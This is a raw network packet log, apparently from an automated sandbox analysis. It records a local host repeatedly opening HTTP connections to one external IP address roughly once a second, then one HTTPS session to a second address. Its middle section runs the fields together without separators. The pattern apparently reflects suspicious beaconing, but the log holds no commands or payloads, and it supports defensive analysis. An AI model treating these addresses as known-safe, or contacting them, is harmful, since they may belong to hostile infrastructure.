Oct 8, 2024 00:19:57.944235086 CEST | 49738 | 80 | 192.168.2.4 | 109.175.29.39
Oct 8, 2024 00:19:57.944255114 CEST | 49738 | 80 | 192.168.2.4 | 109.175.29.39
Oct 8, 2024 00:19:57.952708960 CEST | 80 | 49738 | 109.175.29.39 | 192.168.2.4
Oct 8, 2024 00:19:57.953169107 CEST | 80 | 49738 | 109.175.29.39 | 192.168.2.4
Oct 8, 2024 00:19:58.701877117 CEST | 80 | 49738 | 109.175.29.39 | 192.168.2.4
Oct 8, 2024 00:19:58.701967001 CEST | 80 | 49738 | 109.175.29.39 | 192.168.2.4
Oct 8, 2024 00:19:58.702025890 CEST | 49738 | 80 | 192.168.2.4 | 109.175.29.39
Oct 8, 2024 00:19:58.702208996 CEST | 49738 | 80 | 192.168.2.4 | 109.175.29.39
Oct 8, 2024 00:19:58.705020905 CEST | 49739 | 80 | 192.168.2.4 | 109.175.29.39
Oct 8, 2024 00:19:58.706980944 CEST | 80 | 49738 | 109.175.29.39 | 192.168.2.4
Oct 8, 2024 00:19:58.709888935 CEST | 80 | 49739 | 109.175.29.39 | 192.168.2.4
Oct 8, 2024 00:19:58.709959030 CEST | 49739 | 80 | 192.168.2.4 | 109.175.29.39
Oct 8, 2024 00:19:58.710067034 CEST | 49739 | 80 | 192.168.2.4 | 109.175.29.39
Oct 8, 2024 00:19:58.710134983 CEST | 49739 | 80 | 192.168.2.4 | 109.175.29.39
Oct 8, 2024 00:19:58.714973927 CEST | 80 | 49739 | 109.175.29.39 | 192.168.2.4
Oct 8, 2024 00:19:58.715029955 CEST | 80 | 49739 | 109.175.29.39 | 192.168.2.4
Oct 8, 2024 00:19:59.466635942 CEST | 80 | 49739 | 109.175.29.39 | 192.168.2.4
Oct 8, 2024 00:19:59.466762066 CEST | 80 | 49739 | 109.175.29.39 | 192.168.2.4
Oct 8, 2024 00:19:59.466826916 CEST | 49739 | 80 | 192.168.2.4 | 109.175.29.39
Oct 8, 2024 00:19:59.467236042 CEST | 49739 | 80 | 192.168.2.4 | 109.175.29.39
Oct 8, 2024 00:19:59.469521046 CEST | 49740 | 80 | 192.168.2.4 | 109.175.29.39
Oct 8, 2024 00:19:59.472121954 CEST | 80 | 49739 | 109.175.29.39 | 192.168.2.4
Oct 8, 2024 00:19:59.474514961 CEST | 80 | 49740 | 109.175.29.39 | 192.168.2.4
Oct 8, 2024 00:19:59.474579096 CEST | 49740 | 80 | 192.168.2.4 | 109.175.29.39
Oct 8, 2024 00:19:59.474740028 CEST | 49740 | 80 | 192.168.2.4 | 109.175.29.39
Oct 8, 2024 00:19:59.474785089 CEST | 49740 | 80 | 192.168.2.4 | 109.175.29.39
Oct 8, 2024 00:19:59.479492903 CEST | 80 | 49740 | 109.175.29.39 | 192.168.2.4
Oct 8, 2024 00:19:59.479638100 CEST | 80 | 49740 | 109.175.29.39 | 192.168.2.4
Oct 8, 2024 00:20:00.843122959 CEST | 80 | 49740 | 109.175.29.39 | 192.168.2.4
Oct 8, 2024 00:20:00.843162060 CEST | 80 | 49740 | 109.175.29.39 | 192.168.2.4
Oct 8, 2024 00:20:00.843225956 CEST | 49740 | 80 | 192.168.2.4 | 109.175.29.39
Oct 8, 2024 00:20:00.843415022 CEST | 49740 | 80 | 192.168.2.4 | 109.175.29.39
Oct 8, 2024 00:20:00.846532106 CEST | 49741 | 80 | 192.168.2.4 | 109.175.29.39
Oct 8, 2024 00:20:00.848227978 CEST | 80 | 49740 | 109.175.29.39 | 192.168.2.4
Oct 8, 2024 00:20:00.851527929 CEST | 80 | 49741 | 109.175.29.39 | 192.168.2.4
Oct 8, 2024 00:20:00.851618052 CEST | 49741 | 80 | 192.168.2.4 | 109.175.29.39
Oct 8, 2024 00:20:00.851763964 CEST | 49741 | 80 | 192.168.2.4 | 109.175.29.39
Oct 8, 2024 00:20:00.851783991 CEST | 49741 | 80 | 192.168.2.4 | 109.175.29.39
Oct 8, 2024 00:20:00.856611013 CEST | 80 | 49741 | 109.175.29.39 | 192.168.2.4
Oct 8, 2024 00:20:00.856729031 CEST | 80 | 49741 | 109.175.29.39 | 192.168.2.4
Oct 8, 2024 00:20:01.602030993 CEST | 80 | 49741 | 109.175.29.39 | 192.168.2.4
Oct 8, 2024 00:20:01.602149963 CEST | 80 | 49741 | 109.175.29.39 | 192.168.2.4
Oct 8, 2024 00:20:01.602247953 CEST | 49741 | 80 | 192.168.2.4 | 109.175.29.39
Oct 8, 2024 00:20:01.602365017 CEST | 49741 | 80 | 192.168.2.4 | 109.175.29.39
Oct 8, 2024 00:20:01.604976892 CEST | 49742 | 80 | 192.168.2.4 | 109.175.29.39
Oct 8, 2024 00:20:01.609704971 CEST | 80 | 49741 | 109.175.29.39 | 192.168.2.4
Oct 8, 2024 00:20:01.611361027 CEST | 80 | 49742 | 109.175.29.39 | 192.168.2.4
Oct 8, 2024 00:20:01.611439943 CEST | 49742 | 80 | 192.168.2.4 | 109.175.29.39
Oct 8, 2024 00:20:01.611601114 CEST | 49742 | 80 | 192.168.2.4 | 109.175.29.39
Oct 8, 2024 00:20:01.611614943 CEST | 49742 | 80 | 192.168.2.4 | 109.175.29.39
Oct 8, 2024 00:20:01.618072987 CEST | 80 | 49742 | 109.175.29.39 | 192.168.2.4
Oct 8, 2024 00:20:01.619208097 CEST | 80 | 49742 | 109.175.29.39 | 192.168.2.4
Oct 8, 2024 00:20:02.372348070 CEST | 80 | 49742 | 109.175.29.39 | 192.168.2.4
Oct 8, 2024 00:20:02.373110056 CEST | 80 | 49742 | 109.175.29.39 | 192.168.2.4
Oct 8, 2024 00:20:02.373194933 CEST | 49742 | 80 | 192.168.2.4 | 109.175.29.39
Oct 8, 2024 00:20:02.386465073 CEST | 49742 | 80 | 192.168.2.4 | 109.175.29.39
Oct 8, 2024 00:20:02.393029928 CEST | 80 | 49742 | 109.175.29.39 | 192.168.2.4
Oct 8, 2024 00:20:02.438643932 CEST | 49743 | 80 | 192.168.2.4 | 109.175.29.39
Oct 8, 2024 00:20:02.446197033 CEST | 80 | 49743 | 109.175.29.39 | 192.168.2.4
Oct 8, 2024 00:20:02.446297884 CEST | 49743 | 80 | 192.168.2.4 | 109.175.29.39
Oct 8, 2024 00:20:02.449340105 CEST | 49743 | 80 | 192.168.2.4 | 109.175.29.39
Oct 8, 2024 00:20:02.449341059 CEST | 49743 | 80 | 192.168.2.4 | 109.175.29.39
Oct 8, 2024 00:20:02.455744028 CEST | 80 | 49743 | 109.175.29.39 | 192.168.2.4
Oct 8, 2024 00:20:02.457406044 CEST | 80 | 49743 | 109.175.29.39 | 192.168.2.4
Oct 8, 2024 00:20:03.356353045 CEST | 80 | 49743 | 109.175.29.39 | 192.168.2.4
Oct 8, 2024 00:20:03.356946945 CEST | 80 | 49743 | 109.175.29.39 | 192.168.2.4
Oct 8, 2024 00:20:03.357048988 CEST | 49743 | 80 | 192.168.2.4 | 109.175.29.39
Oct 8, 2024 00:20:03.390594006 CEST | 49743 | 80 | 192.168.2.4 | 109.175.29.39
Oct 8, 2024 00:20:03.397942066 CEST | 80 | 49743 | 109.175.29.39 | 192.168.2.4
Oct 8, 2024 00:20:03.450066090 CEST | 49744 | 80 | 192.168.2.4 | 109.175.29.39
Oct 8, 2024 00:20:03.457339048 CEST | 80 | 49744 | 109.175.29.39 | 192.168.2.4
Oct 8, 2024 00:20:03.457442045 CEST | 49744 | 80 | 192.168.2.4 | 109.175.29.39
Oct 8, 2024 00:20:03.457595110 CEST | 49744 | 80 | 192.168.2.4 | 109.175.29.39
                                                                                                      Oct 8, 2024 00:20:03.458580971 CEST4974480192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:03.464298964 CEST8049744109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:03.466051102 CEST8049744109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:04.230143070 CEST8049744109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:04.230623960 CEST8049744109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:04.230689049 CEST4974480192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:04.230730057 CEST4974480192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:04.234414101 CEST4974580192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:04.237746000 CEST8049744109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:04.240621090 CEST8049745109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:04.240715981 CEST4974580192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:04.240966082 CEST4974580192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:04.241074085 CEST4974580192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:04.246997118 CEST8049745109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:04.247123003 CEST8049745109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:05.016217947 CEST8049745109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:05.016556978 CEST8049745109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:05.016634941 CEST4974580192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:05.016676903 CEST4974580192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:05.019660950 CEST4974680192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:05.023840904 CEST8049745109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:05.026969910 CEST8049746109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:05.028295040 CEST4974680192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:05.028496027 CEST4974680192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:05.028522015 CEST4974680192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:05.035561085 CEST8049746109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:05.037798882 CEST8049746109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:05.781755924 CEST8049746109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:05.782242060 CEST8049746109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:05.782303095 CEST4974680192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:05.782428026 CEST4974680192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:05.785281897 CEST4974780192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:05.791596889 CEST8049746109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:05.792692900 CEST8049747109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:05.792794943 CEST4974780192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:05.793008089 CEST4974780192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:05.793045044 CEST4974780192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:05.800195932 CEST8049747109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:05.801297903 CEST8049747109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:06.618855953 CEST8049747109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:06.621561050 CEST8049747109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:06.621612072 CEST4974780192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:06.621665001 CEST4974780192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:06.624871969 CEST4974880192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:06.628721952 CEST8049747109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:06.632170916 CEST8049748109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:06.632250071 CEST4974880192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:06.632400036 CEST4974880192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:06.632436991 CEST4974880192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:06.639380932 CEST8049748109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:06.639411926 CEST8049748109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:07.424420118 CEST8049748109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:07.425009966 CEST8049748109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:07.425060034 CEST4974880192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:07.425307989 CEST4974880192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:07.427958965 CEST4974980192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:07.431296110 CEST8049748109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:07.433876991 CEST8049749109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:07.433937073 CEST4974980192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:07.434107065 CEST4974980192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:07.434158087 CEST4974980192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:07.439353943 CEST8049749109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:07.439364910 CEST8049749109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:08.185679913 CEST8049749109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:08.187486887 CEST8049749109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:08.187550068 CEST4974980192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:08.195981026 CEST4974980192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:08.198646069 CEST4975080192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:08.202512026 CEST8049749109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:08.205338001 CEST8049750109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:08.205423117 CEST4975080192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:08.205815077 CEST4975080192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:08.205854893 CEST4975080192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:08.212004900 CEST8049750109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:08.213663101 CEST8049750109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:08.987888098 CEST8049750109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:08.988256931 CEST8049750109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:08.988327980 CEST4975080192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:08.988379002 CEST4975080192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:08.990876913 CEST4975180192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:08.994833946 CEST8049750109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:08.997648954 CEST8049751109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:08.997725010 CEST4975180192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:08.997863054 CEST4975180192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:08.997879982 CEST4975180192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:09.004854918 CEST8049751109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:09.005728006 CEST8049751109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:09.998981953 CEST8049751109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:09.999119997 CEST8049751109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:09.999180079 CEST4975180192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:09.999495983 CEST4975180192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:10.002443075 CEST4975280192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:10.007442951 CEST8049751109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:10.009107113 CEST8049752109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:10.009295940 CEST4975280192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:10.009479046 CEST4975280192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:10.009502888 CEST4975280192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:10.016176939 CEST8049752109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:10.017062902 CEST8049752109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:10.795332909 CEST8049752109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:10.795372009 CEST8049752109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:10.795484066 CEST4975280192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:10.795602083 CEST4975280192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:10.798019886 CEST4975380192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:10.802954912 CEST8049752109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:10.804753065 CEST8049753109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:10.804811954 CEST4975380192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:10.804972887 CEST4975380192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:10.804992914 CEST4975380192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:10.811449051 CEST8049753109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:10.813158989 CEST8049753109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:11.584964037 CEST8049753109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:11.584986925 CEST8049753109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:11.585120916 CEST4975380192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:11.585309029 CEST4975380192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:11.588279963 CEST4975480192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:11.592228889 CEST8049753109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:11.595700979 CEST8049754109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:11.597956896 CEST4975480192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:11.597956896 CEST4975480192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:11.597990990 CEST4975480192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:11.605500937 CEST8049754109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:11.606997013 CEST8049754109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:12.351321936 CEST8049754109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:12.351490021 CEST8049754109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:12.351541042 CEST4975480192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:12.351646900 CEST4975480192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:12.354286909 CEST4975580192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:12.358840942 CEST8049754109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:12.361083984 CEST8049755109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:12.361218929 CEST4975580192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:12.361294985 CEST4975580192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:12.361305952 CEST4975580192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:12.368458986 CEST8049755109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:12.370722055 CEST8049755109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:13.116003990 CEST8049755109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:13.116040945 CEST8049755109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:13.116137028 CEST4975580192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:13.116487980 CEST4975580192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:13.121377945 CEST8049755109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:13.355128050 CEST4975680192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:13.360045910 CEST8049756109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:13.360117912 CEST4975680192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:13.360466957 CEST4975680192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:13.360500097 CEST4975680192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:13.365240097 CEST8049756109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:13.365272045 CEST8049756109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:14.108429909 CEST8049756109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:14.108741999 CEST8049756109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:14.108812094 CEST4975680192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:14.108844995 CEST4975680192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:14.113524914 CEST4975780192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:14.113677979 CEST8049756109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:14.118304968 CEST8049757109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:14.118573904 CEST4975780192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:14.118573904 CEST4975780192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:14.118573904 CEST4975780192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:14.123399973 CEST8049757109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:14.123409986 CEST8049757109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:14.977386951 CEST8049757109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:14.977413893 CEST8049757109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:14.977526903 CEST4975780192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:14.977886915 CEST4975780192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:14.980313063 CEST4975880192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:20:14.985558987 CEST8049757109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:20:14.986932039 CEST8049758109.175.29.39192.168.2.4
Oct 8, 2024 00:20:14.987015963 CEST  49758  80     192.168.2.4    109.175.29.39
Oct 8, 2024 00:20:14.987154961 CEST  49758  80     192.168.2.4    109.175.29.39
Oct 8, 2024 00:20:14.987200975 CEST  49758  80     192.168.2.4    109.175.29.39
Oct 8, 2024 00:20:14.994054079 CEST  80     49758  109.175.29.39  192.168.2.4
Oct 8, 2024 00:20:14.995093107 CEST  80     49758  109.175.29.39  192.168.2.4
Oct 8, 2024 00:20:15.764854908 CEST  80     49758  109.175.29.39  192.168.2.4
Oct 8, 2024 00:20:15.765654087 CEST  80     49758  109.175.29.39  192.168.2.4
Oct 8, 2024 00:20:15.765842915 CEST  49758  80     192.168.2.4    109.175.29.39
Oct 8, 2024 00:20:15.769094944 CEST  49758  80     192.168.2.4    109.175.29.39
Oct 8, 2024 00:20:15.774219036 CEST  80     49758  109.175.29.39  192.168.2.4
Oct 8, 2024 00:20:15.962107897 CEST  49759  80     192.168.2.4    109.175.29.39
Oct 8, 2024 00:20:15.967855930 CEST  80     49759  109.175.29.39  192.168.2.4
Oct 8, 2024 00:20:15.967946053 CEST  49759  80     192.168.2.4    109.175.29.39
Oct 8, 2024 00:20:15.980737925 CEST  49759  80     192.168.2.4    109.175.29.39
Oct 8, 2024 00:20:15.982208014 CEST  49759  80     192.168.2.4    109.175.29.39
Oct 8, 2024 00:20:15.987967968 CEST  80     49759  109.175.29.39  192.168.2.4
Oct 8, 2024 00:20:15.988672972 CEST  80     49759  109.175.29.39  192.168.2.4
Oct 8, 2024 00:20:16.759238005 CEST  80     49759  109.175.29.39  192.168.2.4
Oct 8, 2024 00:20:16.759263039 CEST  80     49759  109.175.29.39  192.168.2.4
Oct 8, 2024 00:20:16.759382010 CEST  49759  80     192.168.2.4    109.175.29.39
Oct 8, 2024 00:20:16.759639025 CEST  49759  80     192.168.2.4    109.175.29.39
Oct 8, 2024 00:20:16.762031078 CEST  49760  443    192.168.2.4    23.145.40.164
Oct 8, 2024 00:20:16.762068033 CEST  443    49760  23.145.40.164  192.168.2.4
Oct 8, 2024 00:20:16.762202024 CEST  49760  443    192.168.2.4    23.145.40.164
Oct 8, 2024 00:20:16.762857914 CEST  49760  443    192.168.2.4    23.145.40.164
Oct 8, 2024 00:20:16.762872934 CEST  443    49760  23.145.40.164  192.168.2.4
Oct 8, 2024 00:20:16.766304970 CEST  80     49759  109.175.29.39  192.168.2.4
Oct 8, 2024 00:20:17.343288898 CEST  443    49760  23.145.40.164  192.168.2.4
Oct 8, 2024 00:20:17.343403101 CEST  49760  443    192.168.2.4    23.145.40.164
Oct 8, 2024 00:20:17.348098040 CEST  49760  443    192.168.2.4    23.145.40.164
Oct 8, 2024 00:20:17.348125935 CEST  443    49760  23.145.40.164  192.168.2.4
Oct 8, 2024 00:20:17.348367929 CEST  443    49760  23.145.40.164  192.168.2.4
Oct 8, 2024 00:20:17.357239962 CEST  49760  443    192.168.2.4    23.145.40.164
Oct 8, 2024 00:20:17.403399944 CEST  443    49760  23.145.40.164  192.168.2.4
Oct 8, 2024 00:20:17.706373930 CEST  443    49760  23.145.40.164  192.168.2.4
Oct 8, 2024 00:20:17.706403017 CEST  443    49760  23.145.40.164  192.168.2.4
Oct 8, 2024 00:20:17.706818104 CEST  49760  443    192.168.2.4    23.145.40.164
Oct 8, 2024 00:20:17.706845999 CEST  443    49760  23.145.40.164  192.168.2.4
Oct 8, 2024 00:20:17.748637915 CEST  49760  443    192.168.2.4    23.145.40.164
Oct 8, 2024 00:20:17.791115046 CEST  443    49760  23.145.40.164  192.168.2.4
Oct 8, 2024 00:20:17.791131020 CEST  443    49760  23.145.40.164  192.168.2.4
Oct 8, 2024 00:20:17.791207075 CEST  49760  443    192.168.2.4    23.145.40.164
Oct 8, 2024 00:20:17.791466951 CEST  443    49760  23.145.40.164  192.168.2.4
Oct 8, 2024 00:20:17.791476011 CEST  443    49760  23.145.40.164  192.168.2.4
Oct 8, 2024 00:20:17.791534901 CEST  49760  443    192.168.2.4    23.145.40.164
Oct 8, 2024 00:20:17.792346954 CEST  443    49760  23.145.40.164  192.168.2.4
Oct 8, 2024 00:20:17.792574883 CEST  49760  443    192.168.2.4    23.145.40.164
Oct 8, 2024 00:20:17.793276072 CEST  443    49760  23.145.40.164  192.168.2.4
Oct 8, 2024 00:20:17.793385983 CEST  49760  443    192.168.2.4    23.145.40.164
Oct 8, 2024 00:20:17.874958038 CEST  443    49760  23.145.40.164  192.168.2.4
Oct 8, 2024 00:20:17.875058889 CEST  443    49760  23.145.40.164  192.168.2.4
Oct 8, 2024 00:20:17.875101089 CEST  49760  443    192.168.2.4    23.145.40.164
Oct 8, 2024 00:20:17.875118971 CEST  443    49760  23.145.40.164  192.168.2.4
Oct 8, 2024 00:20:17.875154972 CEST  49760  443    192.168.2.4    23.145.40.164
Oct 8, 2024 00:20:17.875155926 CEST  49760  443    192.168.2.4    23.145.40.164
Oct 8, 2024 00:20:17.876811028 CEST  443    49760  23.145.40.164  192.168.2.4
Oct 8, 2024 00:20:17.877299070 CEST  49760  443    192.168.2.4    23.145.40.164
Oct 8, 2024 00:20:17.877635956 CEST  443    49760  23.145.40.164  192.168.2.4
Oct 8, 2024 00:20:17.877734900 CEST  49760  443    192.168.2.4    23.145.40.164
Oct 8, 2024 00:20:17.878448963 CEST  443    49760  23.145.40.164  192.168.2.4
Oct 8, 2024 00:20:17.878766060 CEST  49760  443    192.168.2.4    23.145.40.164
Oct 8, 2024 00:20:17.879566908 CEST  443    49760  23.145.40.164  192.168.2.4
Oct 8, 2024 00:20:17.879645109 CEST  49760  443    192.168.2.4    23.145.40.164
Oct 8, 2024 00:20:17.942348957 CEST  443    49760  23.145.40.164  192.168.2.4
Oct 8, 2024 00:20:17.942514896 CEST  49760  443    192.168.2.4    23.145.40.164
Oct 8, 2024 00:20:17.960124016 CEST  443    49760  23.145.40.164  192.168.2.4
Oct 8, 2024 00:20:17.960321903 CEST  49760  443    192.168.2.4    23.145.40.164
Oct 8, 2024 00:20:17.960397005 CEST  443    49760  23.145.40.164  192.168.2.4
Oct 8, 2024 00:20:17.960966110 CEST  443    49760  23.145.40.164  192.168.2.4
Oct 8, 2024 00:20:17.961025953 CEST  49760  443    192.168.2.4    23.145.40.164
Oct 8, 2024 00:20:17.961025953 CEST  49760  443    192.168.2.4    23.145.40.164
